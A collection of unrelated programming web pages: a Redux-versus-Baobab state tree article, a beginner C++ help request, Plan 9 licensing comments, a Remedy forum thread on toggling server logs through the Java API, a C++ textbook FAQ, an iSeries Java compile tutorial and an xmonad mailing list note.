export default {
  savingTodo() {
    this.dispatch();
  },
  addTodo(todo) {
    this.actions.savingTodo();
    ajax.post('/todos', todo)
      .then(() => {
        this.actions.savedTodo();
        this.dispatch(todo);
      });
  },
  savedTodo() {
    this.dispatch();
  }
};

And with Redux you also create functions, though you dispatch that function. This function receives the dispatch, allowing it to use it multiple times:

saveTodo.js

import ajax from 'ajax';

export function addTodo(todo) {
  return (dispatch) => {
    dispatch({type: 'SAVING_TODO'});
    ajax.post('/todos', todo)
      .then(() => {
        dispatch({type: 'SAVED_TODO'});
        dispatch({
          type: 'ADD_TODO',
          todo: todo
        });
      });
  };
}

Comparing Redux with a single state tree

So now we have taken a look at how Flux works. I indicated early in this article that Redux differs from a typical state tree. The reason I state that is because you do not define a Redux app as a single state tree, you define the branches separately in reducers and then you attach the branches later. You might say, "what is the difference?". Readability. This is the first part of what makes Redux, and Flux in general, less readable than a typical single state tree. Like our example above:

import todos from './reducers/todos';

{
  todos
}

But the tree really looks like this:

{
  todos: {
    list: [],
    isSaving: false
  }
}

With Redux you do not describe the tree as a whole, but that is one of the greatest benefits of a single state tree. You can just read it and understand the complete state of your application. So let us look more into a tree that is defined and operated on as a whole, like Baobab.
import Baobab from 'baobab';

const tree = new Baobab({
  todos: {
    isSaving: false,
    list: []
  }
});

So this is actually all we need when defining a Baobab tree. We create the tree by passing the object representing all the state. We do not split it into multiple state containers. If we want more state we just add it to this single object. With very big applications you might decide to split the tree into multiple "applications", but you will still be able to read all the state of the specific "application" as a whole.

But how do we act upon dispatched actions? Well, when you represent all the state in your application as one state container you do not need a dispatcher and actions. There is only one place to go and that is the Baobab tree. And it is still as predictable as traditional Flux. But what about the switch statements, we have to change the state of the tree! With a Baobab tree you do not need to define custom state changing logic, you have an API to change the state.

But what about immutability then? You actually do not have to use a reducer to allow immutability, Baobab is also immutable. Think of the tree as always being the same and when you create it, new Baobab({}), you pass the first branch, sitting on the top of the tree. That branch can have more branches and so it grows. So imagine our tree as:

 isSaving   list
      \      /
       \    /
        \  /
       todos
       \---/
       |   |
       |   |   <- Tree
       |___|

When we make a change to a branch, like tree.set(['todos', 'isSaving'], false), it will break the whole branch off the tree and also break off any other joined branches, in this case the list branch:

 isSaving   list
      \      /
       \    /
        \  /
       todos
       \---/
       |   |
       |   |   <- Tree
       |___|

Now it replaces the branch we changed with a completely new one and then it reattaches the list branch.
 (false)     (true)
isSaving    isSaving   list
       \          \      /
        \          \    /
         \          \  /
        todos      todos
                   \---/
                   |   |
                   |   |   <- Tree
                   |___|

What this boils down to is that you do not need a dispatcher and actions with a single state tree, and you change the state of the tree with imperative programming. An example being: tree.set(['todos', 'isSaving'], true). You might have heard that imperative programming is out and the new thing is functional programming. And yeah, it is really great to see all the projects evolving around functional programming, but that does not mean you should never do imperative programming. It is all about the right tool for the job. And if you think about it, with Redux and Immutable JS you do a lot of imperative programming.

Tree basics

So let us move back to the beginning of this article and look at how the state changes occur with a single state tree.

              |----------|
           |--| FUNCTION |
           |  |----------|
|------|   |  |----------|
| TREE |<--+--| FUNCTION |
|------|   |  |----------|
           |  |----------|
           |--| FUNCTION |
              |----------|

There is no dispatcher and no actions. We just have normal functions that change the state of the tree.

Defining the tree

I already showed you this, but let us recap. To create the state of our application we:

import Baobab from 'baobab';

export default new Baobab({
  todos: {
    isSaving: false,
    list: []
  }
});

Again, we do not split our state definition into different files and create logic for changing the state. We just describe it "as is".

Actions and action creators

Since there are no actions using a single state tree you do not really need action creators either. What you need though is to change the state of the state tree.
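The branch replacement described above can be imitated with plain JavaScript objects, showing why untouched branches keep their identity — which is what makes shallow equality checks cheap when rendering. This is a sketch of the idea only, not Baobab's actual implementation:

```javascript
// A hypothetical immutable "set": copy the nodes along the changed path,
// reuse every untouched branch by reference.
function setIn(tree, path, value) {
  if (path.length === 0) return value;
  const [key, ...rest] = path;
  return { ...tree, [key]: setIn(tree[key], rest, value) };
}

const tree = { todos: { isSaving: false, list: [] } };
const next = setIn(tree, ['todos', 'isSaving'], true);

console.log(next.todos.isSaving);                  // true
console.log(next !== tree);                        // true - changed path is new
console.log(next.todos !== tree.todos);            // true
console.log(next.todos.list === tree.todos.list);  // true - list branch reused
```

The todos branch was on the changed path, so it is replaced; the list branch was not touched, so the old reference is reattached as-is.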
And the way you do that is:

import tree from './tree';
import ajax from 'ajax';

function addTodo(todo) {
  tree.set(['todos', 'isSaving'], true);
  ajax.post('/todos', todo)
    .then(() => {
      tree.set(['todos', 'isSaving'], false);
      tree.push(['todos', 'list'], todo);
    });
}

With a single state tree like Baobab you use imperative programming to do your state changes, just like you do normally in JavaScript. The tree is still immutable though, so any changes to the branches of the tree will replace the whole branch, not just the value on the branch. This makes it possible to do shallow checking of values when rendering React components, making it super fast.

Notice the difference here. We only have one construct defining how our application changes its state. We do not have two different constructs, where one defines the async operations (action creator) and the other defines the sync changes (store/reducer). This is really important. This is the second part of how readability of your code is reduced compared to a single state tree like Baobab.

Getting back what we lost

You might say now that the function above is horrible to test or that you cannot get time travel with this approach. And yeah, you are right. But if you imagine this state tree being your database and you watch the video Turning the database inside out, you will quickly realize that it is not the database itself that needs to handle these features, it is a transaction layer in front of it. One such layer is cerebral and it is functional. With Cerebral you use a functional approach to define the flow of state changes in your application.
And this is where the functional approach shines over the imperative approach:

const items = [{title: 'foo', isAwesome: true}, {title: 'bar', isAwesome: false}];

// functional
const isAwesome = (item) => item.isAwesome;
const byTitle = (item) => item.title;
const awesomeItemTitles = items.filter(isAwesome).map(byTitle);

// imperative
const awesomeItemTitles = [];
items.forEach((item) => {
  if (item.isAwesome) {
    awesomeItemTitles.push(item.title);
  }
});

When defining flow the functional approach gives you something powerful. It gives you the power to describe what is happening to your application in great detail, without the verbosity of implementation details. The line items.filter(isAwesome).map(byTitle) tells you what happens, but the imperative example requires you to read all the implementation details to understand it. This might not make much sense with such a simple example, but you would be surprised how quickly it becomes beneficial.

With Cerebral you get the same kind of functional flow, though it allows you to build more complex flows like combining asynchronous flows with synchronous flows, parallel asynchronous flows and even conditional flows. This is the problem space Cerebral tries to solve. Expressing the flow of state changes in your application. And since the functions you are referencing in this flow just operate on their argument, you get the testability you want. And yes, you even get time travel debugging.

So I have been talking about approaching different problems with different tools, so let's do an experiment where we want to search something. We take a functional reactive approach to events:

Observable.fromEvent(input, 'change')
  .debounce(200)
  .map((event) => ({value: event.target.value}))
  .forEach(this.props.signals.inputChanged);

A functional approach to define complex state changes:
signal('inputChanged', [
  setInputValue,
  setLoadingResult,
  [
    getResult, {
      success: [setResult],
      error: [setResultError]
    }
  ],
  unsetLoadingResult
]);

And an imperative approach to actually change our state values:

function setInputValue(input, state) {
  state.set(['currentValue'], input.value);
}

This example can of course easily be solved with only one class of programming, be it FRP, functional or imperative. But it is when our applications grow and have to handle XXX times the complexity shown here that we start to see each of these approaches has its downsides in terms of readability.

Summary

There are many things happening in the JavaScript community now, and functional programming and functional reactive programming are really starting to get a foothold. That is great! That said, functional concepts do not necessarily mean better in all scenarios. We have been doing imperative programming for a long time, for better and worse, and there are features of the imperative style that are completely lost when replaced by functional approaches. In my opinion, one of those features is readability of defining and changing state in your application. I would also like to mention that there are other differences between Redux and Baobab, like Cursors and Monkeys, which would also be interesting comparisons. But this article wanted to make a point on readability, which I hope it did. Thanks for reading and please comment if you completely disagree with me, you think I am completely wrong about this or if you can relate to the statements made.
https://christianalfoni.herokuapp.com/articles/2015_11_16_Flux-vs-Single-State-Tree
//my program should be able to collect two words and compare them outputing the words from word1 which are also in word2 and outputing them and viceversa. my problem is in the last four lines before the return. Please help

//Program to shows analysis of texts
#include <iostream> // for cin, cout
#include <string>
#include <iomanip>
using namespace std;

int main()
{
    string word1, word2; //declaration of words

    // Welcome message
    cout<< "------------------------------------------------\n"
        << "     Topiloe's Text analyzer - Release 1.0      \n"
        << "------------------------------------------------\n\n";

    cout<<"Enter two words on one line: ";
    cin>>word1>>word2;

    cout<<"Second word you entered is <"<<word2<<"> \n";
    cout<<"It is "<<word2.length()<<" characters long\n";
    cout<<"Starts with the letter '"<<word2.substr(0,1)<<"'\n";
    int last_word;
    last_word=word2.length()-1;
    cout<<"Ends with the letter '"<<word2.substr(last_word,1)<<"'\n\n";

    cout<<"First word you entered is <"<<word1<<"> \n";
    cout<<"It is "<<word1.length()<<" characters long\n";
    cout<<"Starts with the letter '"<<word1.substr(0,1)<<"'\n";
    last_word=word1.length()-1;
    cout<<"Ends with the letter '"<<word1.substr(last_word,1)<<"'\n\n";

    cout<<"The leters in <"<<word1<<"> which are also in <"<<word2<<"> are"<<word1.find(word2)<<endl;
    cout<<"There are "<<word1.find(word2)<<" words in "<<word1<<" which are also in "<<word2<<endl;
    cout<<"The leters in <"<<word2<<"> which are also in <"<<word1<<"> are"<<word2.find(word1)<<endl;
    cout<<"There are "<<word2.find(word1)<<" words in "<<word2<<" which are also in "<<word1<<endl;
    return 0;
}
https://www.daniweb.com/programming/software-development/threads/473460/text-analysis
This video is a must-see for fans of Plan 9, Raspberry Pi, or both. It's also a great introduction to the OS itself.

I can imagine the stuff shown in the video would have been pretty impressive in the 70s. Nowadays, however, Plan9 just appears hopelessly out of date. Looking at that video I felt like I had entered a time machine:

Sure, to each their own, but you have to realize that being for a limited audience necessarily carries with it smaller developer numbers, and maintaining a modern OS (even just the kernel) requires *tons* of work. Drivers don't write/port themselves, bugs need fixing, new CPU revisions need support changes, etc. etc. I guess if you really focused down on what matters to you and tightly controlled your entire execution environment (hardware/software/etc.) you could limit this to a manageable size, but anything close to general-purpose nowadays requires a lot of work, and hobbyist efforts by a small community can only get you so far.

I never said otherwise. I'm an OS hobbyist, as are many of the readers and contributors here, and I know Plan9 isn't feasible for a daily use OS. Neither are Amiga, OS/2, BeOS, Haiku, BareMetalOS, Syllable, and dozens of other obscure, outdated, or tiny projects. That doesn't mean they are uninteresting or not worth reading and talking about. And that's all I'm doing, sharing my joy for such niche OSes. I don't think there's anything wrong with that, especially on this website.

A lot of experimental OS development is done under the GPL, so this should definitely increase cross-pollination between projects. Also, I still remember getting the boxed set of Plan 9 for Christmas while in high school... I remember emailing Brian Kernighan a question about it, when I could barely write a hello world program in C, and amazingly he replied (wish I still had that email). Here's what he had to say about plan 9 in an interview: "."
source: Edited 2014-02-15 01:36 UTC

I wonder what implications, if any, this has for Glendix: Edited 2014-02-15 02:40 UTC

Little. Very little Plan9 code can be directly compiled on Linux (or any other OS), thanks to the unusual C syntax and includes of Plan9's compiler and standard library, respectively. Plan9 is not a POSIX compliant OS; indeed, Plan9 was made for the very purpose of replacing UNIX and its concepts. It does offer a compatibility layer to port POSIX/ANSI C things to it, though. So, code made specifically for Plan9 usually stays on Plan9.

I'm afraid this dual-licensing announcement (together with the fact that it is made by UCB, not Lucent) means that Lucent revokes all funding of the project - there were Lucent employees still working on Plan 9 - which means nothing particularly good for Plan 9 in the short term.

P.S.: If anyone is interested in running Plan 9, it is probably better to start with 9front,[0] which appears to provide a better end-user experience on common i386 hardware at this point.

P.P.S.: Actually the community around Plan 9 doesn't like the GPL too much,[1] so I am puzzled by the motivation behind this move.

[0] [1]

Yeah, I am afraid I can't give that page () high marks. There is little (if anything) in terms of well thought out reasoning, and instead there is just endless damning by anecdote, and accusations. Hell, the page on Java even admits the information on Java is out of date but doesn't care. That whole section can (to my mind) be read as "here are things we don't like, and we will use any argument to justify it". If that is how the 9front team actually thinks then I personally consider them harmful...

Most of that stuff was maintained by Uriel; he was also a bit opinionated, as you can see in a FOSDEM 2006 presentation. Sadly, he is no longer among us. I miss my discussions with him over at HN/Reddit about Go.

I have no problem with opinionated, but to simply assert things and only provide anecdotes is just intellectually lazy.
His assertion that CVS/tarballs is better than SVN is a particular example. I am not asking you to defend him, or anything he said; but honestly 9front would be better off ditching that whole section and simply saying "these are the things we prefer" without any justification.

ddc_, "Harmful Things: GPL, LGPL, Apache Software License, MPL, CC." "Less harmful Alternatives: SC, MIT/X, BSD, CC0, public domain." This is interesting; too bad they did not provide justifications there.

The dislike for the GNU tools kind of makes sense in the context of plan 9, but I don't get why GPL/LGPL are listed.

Some of us consider the GPL license to be a less free choice than BSD. Of course, in this context I mean code freedom rather than the GNU definition. Had plan 9 been released under the BSDL, parts of it could have been added to *BSD, Linux and various other projects. Now, it's limited to just GPL licensed stuff. For someone not in agreement with the GPL, it is almost as frustrating as not having source code, because we can't actually use it. We can modify the original system, but not take the good parts and cross-pollinate it.

Note, it is not the change of license, it is dual licensing. Given that the Plan 9 community has a long track record of not being particularly interested in licenses, I would expect that new commits will continue being dual-licensed, and I'm pretty sure that the LPL is acceptable for everyone (with the notable exception of RMS and other people who don't accept anything but '[A-Z]*GPL').

Had plan 9 been released under BSDL, parts of it could have been added to *BSD, Linux and various other projects. Now, it's limited to just GPL licensed stuff.

Given how GPL code has coexisted with the BSD licensed nuts and bolts in FreeBSD land for a while, what is stopping Plan9 systems from being adopted by the FreeBSD folks is probably technical issues rather than silly licensing red herrings. GPL is actually a pretty good license choice for a small project like this one.
When resources are very limited you want to make sure you can get some return from sharing your codebase. Edited 2014-02-16 22:36 UTC

Here is an explanation: (Although it's a personal blog, I believe it is in line with general cat-v thinking.)

Tangentially on topic: one application from plan 9 that is more widely known is the Acme text editor, which also runs e.g. on Linux: Last I used it, years ago, it looked like crap, but it seems several people, e.g. at FOSDEM, were still using it in the GoLang devroom (I wasn't there, but just noticed that in my twitter stream). Maybe time to try it again to celebrate the occasion...

What makes plan9 shine is its way of implementing things behind the scenes. They learned from the mistakes of others and apply this knowledge to build far better programming interfaces. Experienced programmers should appreciate plan 9's achievements in bringing extremely well thought out designs into reality. It's consistent. Network transparency is more natural. I only wish I got to use it more.

Plan 9 is what posix should have been. I'm probably biased, but I think posix is holding the industry back.

tylerdurden, You got me there... damn your pedantic musings. How do I fix this?

Ok, let's say plan9 had predated the initial posix standards; it would then have been better for the standards to formally adopt the plan9 APIs than what we have now. For better or worse, posix was aimed at formalizing existing unix vendor interfaces rather than designing good ones. This lengthy rant reflects some of my feelings:...

tylerdurden, Yes I used it, albeit a long time ago when I was doing OS research. I didn't do anything "meaningful with it". The GUI was off-putting and probably still is, but it's hard to deny the elegance of its functional designs, especially in the context of the nuanced issues that crop up on other platforms. Ultimately, though, plan9 failed to gain traction, and POSIX designs won out.

tylerdurden, I don't see anything in this thread that warranted your response.
You never really asked what was better and I had no reason to assume you didn't know. However, for those who don't know, plan 9 takes the 'everything is a file' concept from unix and applies it more cleanly & consistently. For example, unix strayed from 'everything is a file' with ioctls, signals, netfilter/netlink, etc, with plenty of caveats along the way. This leads to the dependence on specialized local userspace tools to administer & control the system state. This might be ok, except you lose the network transparency that plan9 gives you for free. To achieve the same thing on unix you'd have to build some new client & daemon to shuttle commands from a remote system, perform authentication, and call the local syscalls. Every new syscall needs a new build of the daemon & client. So it's not too elegant, to say nothing of the potential security risks of running a unix userspace daemon as root.

Plan9 is elegant because we get all of it for free using the tried and tested security model of the file system. Plan9 also encourages regular applications to include "file servers" that can be unified into the namespace, which is a very powerful way to query and control running applications. POSIX signals, on the other hand, are overloaded, scale poorly, and are less intuitive (ie sending "kill -USR1" to dd tells it to print its status, tells apache to reload configuration & restart, etc). Signals also have their own implementation problems, such as being dropped, being restricted to "safe functions", and interrupting normal code flow through the event loop.

My conclusion is only a restatement of what's already been said: most people like the elegance of plan9's approach, however the vast majority (ie everyone) still continues to target POSIX because it's the official standard for writing portable code. I don't know if there's any mainstream software anywhere that takes advantage of plan9's features. I would absolutely love it if someone could point one out.
Edited 2014-02-18 21:51 UTC

I am going to suggest a slight correction to that statement. If it were just that, then all POSIX would need is some refactoring of its APIs into this metaphor to gain all of its benefits. The way I see Plan 9 is that it sees everything as objects (which can be filesystems) in a namespace, for a specific definition of object and namespace. Because of this, things like file versioning become much easier, because the current version of a file is really a namespace representing the head of all current files. Indeed, I think you can get yourself in trouble by reading a path as a collection of files. When I used it, I thought of a path as a collection of objects that interacted with one another.

I don't see anything in this thread that warranted your response.

It was a JOKE. I personally managed to figure out you were also jesting when you called me pedantic. Apparently I can't even ask a simple question without getting downvoted...

You never really asked what was better and I had no reason to assume you didn't know.

I wasn't asking what was better, I was simply trying to figure out what the actual technical arguments for those claims were. Stylistic preferences are highly subjective, so I tend to ignore them. That's all. IMO POSIX is an API for portable code (not necessarily distributed), so perhaps it would make more sense to compare Plan 9 to other distributed systems like Amoeba, OpenSSI, or Kerrighed. Thanks for the response, in any case.

I have a pattern with Plan 9. A ritual, if you will. Every two or three years I'll read an article that will get me excited about Plan 9. The next day I'll research Plan 9: parse its documentation, research supported hardware/VMs, scour the web for posts and testimony of Plan 9's use. On day three I install Plan 9 and poke around by issuing commands to rc, acclimating to acme with its "mouse chording," and then attempting to get networking set up. Day four is my Plan 9 day of rest.
Day five I become apathetic to Plan 9, say "meh" and install another OS.

really tells all, doesn't it. I laughed out loud at that, really. Tk? Really? Not saying looks are all that matters, but being an eyesore isn't an asset.

I don't see how tcl/tk is somehow quantitatively better than Gtk (and I don't even like Gtk).

It wasn't clear from that conversation, but from others I read it is clear that the reason they liked Tk more is because it had a "cleaner" model to their mind and could map onto their metaphor better. Looks (and functionality) literally took a back seat to serving (and not evolving) the metaphor.

"And then you see them spinning their wheels because they can't map the web to Plan 9's metaphor"?

Then I probably didn't express myself clearly enough. I am all for brainstorming; brainstorming is good. It is vital. I am not saying the discussion of how to map the web to their metaphor is spinning their wheels because they had the conversation, but because they more or less stopped. They absolutely should try to map the web to their metaphor, but when they found that they couldn't, the logical thing to do, to my mind, would be to say "oh well, this needs to be an exception". Because they didn't get there and just let the subject drop without any real conclusion, that (and only that) is why I say they spun their wheels. If they had subsequently implemented any form of modern web browser I wouldn't have reached the conclusion I did. But because, nearly a decade and a half later, they still haven't, I (again personally) think my conclusion is justified. My point is that metaphors only take you so far; if you can't make something needed fit, you should either make an exception or adapt your metaphor.
Those conversations, along with many others I have read (I have followed Plan 9 for decades now and even ran it for a bit), have made it clear to me that they are not interested in pragmatism. (minor edits for formatting only) Edited 2014-02-17 17:57 UTC

That might hold Plan9 back, but on the other hand having a project that pushes a specific metaphor to the limit comes in handy for other, more pragmatic projects to decide where such a metaphor really works and where it doesn't.

You are talking about the mid-90s, aren't you? It was released as free software in 2002, and it really wasn't far behind in any aspect, even in web browsing, back then.

No matter what the intention of the dev team behind Plan 9 is, it can still be regarded and used as a kind of research OS by third parties. An incubator for potentially interesting implementations of the "everything is a file" metaphor, if you will.

It seems likely that the reason for choosing GPLv2 was compatibility with the Akaros project at Berkeley, which made this announcement. Ron Minnich, an experienced Plan 9 developer, recently joined Akaros. Thom, how about an article on Akaros? I don't think OSnews has covered it yet.
http://www.osnews.com/comments/27567
Enable and Disable logs
Sanjeeva Gurram, Mar 1, 2012 4:31 AM

Hi Experts,

We are planning to implement things in the way below. Is there any method or script to do this, and what is the better way to achieve it?

- Scheduled job to enable logs (e.g. filter log) and wait for 10 minutes
- After 10 minutes, disable the log(s) and cut and paste the log(s) at some pre-defined place
- Enable the logs again after movement of the file
- Repeat the same process from 1 through 3 continuously

Thanks
Sanjeeva Naidu G

1. Re: Enable and Disable logs
Dhananjay Gundre, Mar 1, 2012 4:33 AM (in response to Sanjeeva Gurram)

Why not use the feature of adding logs to forms and write workflow to remove logs that are not required? You can use the Configuration-ARDBC form to enable and disable logs.

2. Re: Enable and Disable logs
Sanjeeva Gurram, Mar 1, 2012 4:40 AM (in response to Dhananjay Gundre)

Dhananjay,

Do you have any steps to do that? If yes, please share the steps, or any document if you have one.

Thanks
Sanjeeva Naidu G

3. Re: Enable and Disable logs
Laurent Matheo, Mar 6, 2012 3:22 AM (in response to Sanjeeva Gurram)

You could also use APIs (Java for example). It should be the API class LoggingInfo. Unzip the file "ardoc7604_build002.jar" (it should be in the folder "/ARSystem/arserver/api/"); it contains the API help files.

4. Re: Enable and Disable logs
Leonard Warren, Mar 6, 2012 5:52 AM (in response to Laurent Matheo)

Using the Configuration-ARDBC form to activate and deactivate log files will require you to reboot the AR System Server at some point: the changes will take effect, but Developer Studio will pick up that a change was made and keep letting you know when you log into the Studio until the reboot has taken place. It is an option, but you need to understand the results of your actions as well. The utilization of Form logging is a possibility, but it is a huge database resource hit. The information is being stored within your underlying database instead of on your server box.
Leaving the log files on continuously could cause slowness in your system for other operations. But it is an option. The APIs are a possibility, but I have not done this setup at this time. Not sure what is the best way to approach this request. There is always a way to get actions or reactions within Remedy, but for this situation, I am not sure what the best way is at this time.

Lenny

5. Re: Enable and Disable logs
Laurent Matheo, Mar 6, 2012 9:54 AM (in response to Leonard Warren)

My bad, the API I saw (setlogging) is for client side logs; though perhaps it's possible with "SetServerInfo".

6. Re: Enable and Disable logs
Laurent Matheo, Mar 6, 2012 10:52 AM (in response to Laurent Matheo)

Yeah, it's working with SetServerInfo ^_^ Here is a snippet from Java code:

    import com.bmc.arsys.api.ARException;
    import com.bmc.arsys.api.ARServerUser;
    import com.bmc.arsys.api.ServerInfoMap;
    import com.bmc.arsys.api.Value;

    private ARServerUser ID_server = null;
    // put here some code to init the server connection using ID_server,
    // check the integration guide for a full example.

    ServerInfoMap MyMap = new ServerInfoMap();
    Value MyValue = new Value(1);                            // Triggers SQL log
    Value MyValuePath = new Value("c:\\tmp\\logs_sql.log");  // SQL log path
    MyMap.clear();
    MyMap.put(AR_SERVER_INFO_DEBUG_MODE, MyValue);           // 1=2^0=SQL
    MyMap.put(AR_SERVER_INFO_SQL_LOG_FILE, MyValuePath);     // SQL file path
    try {
        ID_server.setServerInfo(MyMap);
        System.out.println("Set log ok!");
    } catch (ARException e) {
        System.out.println("Exception Error in set_all_intel!");
        return false;
    }

You have to do the same process but set the DEBUG_MODE to 0 to deactivate the logging.

7. Re: Enable and Disable logs
Sanjeeva Gurram, Mar 6, 2012 11:14 PM (in response to Leonard Warren)

Lenny,

Do you have any steps for this? If you have any document, can you share it with me? It will be helpful for me.

Thanks
Sanjeeva Naidu G

8.
Re: Enable and Disable logs
Sriram GP, Feb 5, 2013 12:09 AM (in response to Laurent Matheo)

Hi Laurent Matheo,

I am trying to use the same Java code. The SQL logs got enabled, but all other options got unchecked. How do I check/uncheck the SQL log without affecting the other options?

Sriram

9. Re: Enable and Disable logs
LJ LongWing, Feb 5, 2013 12:12 PM (in response to Sriram GP)

The Debug Mode is a bitwise value; you would need to parse the value to determine if a given log is on or not, and then add the appropriate bit mask to the value, or subtract the appropriate amount, to turn it on/off.

10. Re: Enable and Disable logs
Sriram GP, Feb 6, 2013 3:24 AM (in response to LJ LongWing)

Thank you for the information.

Sriram

11. Re: Enable and Disable logs
Abhijit NameToUpdate, May 15, 2013 2:24 AM (in response to Sriram GP)

Guys, we have 9 applications on the same server, so taking the server down is like taking all the applications down. We don't want that; we need a switch to take down just one application. Let me know if we have any such ready option in Remedy.

Thanks,
Abhijit

12. Re: Enable and Disable logs
LJ LongWing, May 15, 2013 7:20 AM (in response to Abhijit NameToUpdate)

You could change the application state of just that application to maintenance and users should not be able to access it, but that only works if the app is in a deployable application.

13. Re: Enable and Disable logs
Abhijit NameToUpdate, May 15, 2013 7:25 AM (in response to LJ LongWing)

Where will I get that option?

14. Re: Enable and Disable logs
LJ LongWing, May 15, 2013 8:41 AM (in response to Abhijit NameToUpdate)

Abhijit,

This is found in the 'AR System Application State' form, but I honestly recommend you read up on the option before making any changes...
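LJ LongWing's bitmask advice (reply 9 above) can be sketched in plain Java, independent of the BMC API. The constant value here is an illustrative assumption taken from the earlier snippet's comment "1=2^0=SQL"; the class and method names are mine:

```java
public class DebugModeBits {
    // Assumption: SQL logging is bit 0 (2^0 = 1) of the Debug Mode bitmask,
    // per the "1=2^0=SQL" comment in the setServerInfo snippet above.
    static final int SQL_LOG_BIT = 1;

    // Is a given log bit currently on?
    static boolean isOn(int debugMode, int bit) {
        return (debugMode & bit) != 0;
    }

    // Turn a bit on without touching the other bits.
    static int enable(int debugMode, int bit) {
        return debugMode | bit;
    }

    // Turn a bit off without touching the other bits.
    static int disable(int debugMode, int bit) {
        return debugMode & ~bit;
    }

    public static void main(String[] args) {
        int debugMode = 6; // some other logs already on (bits 1 and 2)
        debugMode = enable(debugMode, SQL_LOG_BIT);
        System.out.println(debugMode);  // 7: SQL on, other bits preserved
        debugMode = disable(debugMode, SQL_LOG_BIT);
        System.out.println(debugMode);  // 6: SQL off, other bits preserved
    }
}
```

Reading the current Debug Mode, applying enable/disable to only the desired bit, and writing the result back is what avoids unchecking the other options.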
https://communities.bmc.com/message/230742
Answer: If you are an instructor, please visit and select "Instructor Resources". You will need to fill out a form and obtain a password to see the solutions to all exercises.

Answer: The following compilers should work:

Answer: Your compiler (Microsoft Visual C++ 6) does not conform to the C++ standard. A remedy is to add a line

    namespace std {}

above the using namespace std; directive.

Answer: Your compiler (Microsoft Visual C++ 6) does not conform to the C++ standard. A remedy is to rename the index variable in the second loop.

Answer: Your compiler (Microsoft Visual C++ 6 or g++ 2.9x) does not conform to the C++ standard. A remedy is to add the line

    double max(double x, double y) { if (x > y) return x; else return y; }

Answer: Your compiler (g++ 2.9x) does not conform to the C++ standard. A remedy is to change

    #include <sstream>
    . . .
    istringstream instr(s);
    . . .
    ostringstream outstr;
    . . .
    s = outstr.str();

to

    #include <strstream>
    . . .
    istrstream instr(s.c_str());
    . . .
    ostrstream outstr;
    . . .
    s = string(outstr.str());

Answer: Your compiler (g++ 2.9x) does not conform to the C++ standard. A remedy is to replace fixed with setiosflags(ios::fixed).

Answer: It is not a part of the ISO standard, and some compilers don't define it. If you find it implausible that the standard doesn't define it, you can purchase an official copy or check out an unofficial working draft.

Answer: (1) STL uses doubly-linked lists. (2) It is actually easier to implement insertion and deletion in a doubly-linked list.

Answer: This is a book about computing concepts, not about C++. Strings are a concept. ANSI C++ supports two implementations of strings: the string class and char* pointers. There is no doubt that many C++ programmers will need to learn both implementations, but I do not believe they should learn all the details of both of them in their first programming course. The string class is safe and convenient.
Students master it quickly and can move on to learning more computing concepts.

Answer: The <iostream> header and the std namespace were introduced in 1996 and approved in the international standard in 1998. If your compiler does not support these constructs, you will need to upgrade your compiler. g++, Borland C++ 5.5 and Microsoft Visual C++ 6 are reasonably standard compliant.

Answer: Here is a list of currently supported platforms.

Answer: The CCC graphics library has been purposefully kept simple so that students don't fritter away endless time with color and fancy fonts. Use wxWidgets if you want fancier graphics.

Answer: There are many different schemes to name accessors, mutators and data fields. The C++ library uses the overloaded pair seconds() and seconds(int) for accessors and mutators, which I think is a bit too confusing. I felt the get/set terminology makes it really clear that the accessor is a function call. And, of course, that is the convention used in Java.

Answer: The standard C++ library uses no uppercase letters at all, and it uses underscores to make names more readable (bad_cast, push_back). There is nothing wrong with mixed case (getSeconds, readInt); I just wanted to be consistent.
http://www.horstmann.com/bigcpp/faq1.html
To compile a Java program on iSeries you need to have the JDK installed. Click here to learn how to check if Java is installed on your iSeries and what the Java version is.

Here is a sample Java program that we will try to compile:

    package com.as400samplecode;

    public class SimpleJava {

        public static void main(String[] args) {
            String firstName = args[0].trim();
            String lastName = args[1].trim();
            String age = args[2].trim();
            System.out.println("First Name: " + firstName);
            System.out.println("Last Name: " + lastName);
            System.out.println("Age: " + age);
        }
    }

Now you can create a new file called SimpleJava.java in the IFS directory of your choice, or use Eclipse to create the program and then FTP it to the iSeries. To compile the Java program we are going to use the command javac in Qshell.

To start Qshell, use the command QSH and press ENTER. Once inside QSH, next to the $ sign type cd {path_to_your_folder} and press ENTER, for example cd /myName/Java. When you get the $ sign back, that means execution is complete. Now, to compile, type

    javac -d {path_to_your_folder} SimpleJava.java

After the Java program is compiled you will see the $ sign. Now let's run the program; type

    java com.as400samplecode.SimpleJava "Albert" "Who" "35"

Here is the output:

    First Name: Albert
    Last Name: Who
    Age: 35
    $

Let's look at what the compile does: it basically creates a subdirectory called com underneath {path_to_your_folder}, then underneath that the as400samplecode directory, and then the Java class. This is what happens when you package Java programs using this line of code:

    package com.as400samplecode;

Javac Command

    javac [ options ] [ sourcefiles ] [ @argfiles ]

Arguments may be in any order.

- options - Command-line options.
- sourcefiles - One or more source files to be compiled (such as SimpleJava.java).
- @argfiles - One or more files that list options and source files. The -J options are not allowed in these files.

Standard Options
The destination directory must already exist; javac will not create the destination directory.
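The sample program above indexes args[0] through args[2] without checking how many arguments were actually passed, so running it with fewer than three arguments throws ArrayIndexOutOfBoundsException. A slightly more defensive variant (a sketch of mine, not from the original article; the class and method names are illustrative) might look like:

```java
public class SimpleJavaSafe {

    // Build the report, or return null if not enough arguments were supplied.
    static String report(String[] args) {
        if (args.length < 3) {
            return null;
        }
        return "First Name: " + args[0].trim() + "\n"
             + "Last Name: " + args[1].trim() + "\n"
             + "Age: " + args[2].trim();
    }

    public static void main(String[] args) {
        String out = report(args);
        // Print a usage hint instead of crashing on missing arguments.
        System.out.println(out == null
            ? "Usage: SimpleJavaSafe firstName lastName age"
            : out);
    }
}
```

Compiled and run the same way as the original (javac -d, then java with the package-qualified class name), this version prints a usage message instead of failing when an argument is missing.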
https://www.mysamplecode.com/2011/05/iseries-compile-java-programs-beginners.html
John Goerzen wrote:
>> I'd rather have xmonad completely eat all Mod keypresses, and let no other
>> application, even those Windows RDP or VirtualBox sessions, ever see it...
>> Is there a quick trick to accomplish this?

wagnerdm wrote:
> ((0, xK_Super_L), return ()) -- make VirtualBox ignore stray hits of the
> Windows key when xmonad has the active grab

Great! I really need this, because I am about to start using Windows in VirtualBox on a regular basis, and I've already felt this annoyance occasionally in VNC. Thanks!

This is probably something that is needed by a large proportion of xmonad users. Where can it be posted so that people will be likely to hear about it? I don't remember anymore how I found out how to make the Windows key my Mod key. But this important additional setting should be added there.

Thanks,
Yitz
http://www.haskell.org/pipermail/xmonad/2012-February/012405.html
